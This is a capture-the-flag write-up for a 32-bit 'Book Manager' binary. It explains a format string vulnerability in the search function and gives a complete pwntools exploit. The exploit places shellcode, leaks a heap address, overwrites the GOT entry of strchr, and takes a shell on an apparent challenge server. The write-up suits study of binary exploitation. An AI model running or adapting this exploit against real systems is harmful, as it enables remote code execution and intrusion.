A ELF 32-bit LSB executable binary was given which is not stripped.
It is type of menu driven program where you can Inesrt, List, Search, Delete, and Exit form Book Manager.
If you go through the search program you will find the “Format string vulnerability” and the permission of the binary are
CANARY : ENABLED
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial
As NX is disabled so we can execute shellcode. So here is the idea on how to solve the challenge
[*] Leak any of the address form heap through format string vulnerability
[*] Write shell code through insert function
[*] Over write got of strchr with the leaked heap address using format string vulnerability
Here is the exploit
from pwn import *
import format
got_strchr = 0x804b038
shellcode = asm(shellcraft.linux.sh())
def insert(name,idx=0):
p.sendline("1")
p.recvuntil("book name: ")
p.sendline(name)
p.sendlineafter("book id: ",str(idx))
def search(query,choice=False):
p.sendline("3")
p.recvuntil("query: ")
p.sendline(query)
p.recvuntil("Searching with: ")
if choice == True:
addr = int(p.recvline().strip(),16)
p.recvline()
return addr
#p = process("level1.bin")
p = remote("34.198.96.6",9001)
insert(shellcode)
heap = search('0x%7$x',True)
log.success("{}".format(hex(heap)))
payload = format.makepayload(heap,got_strchr,'11')
search(payload)
p.interactive()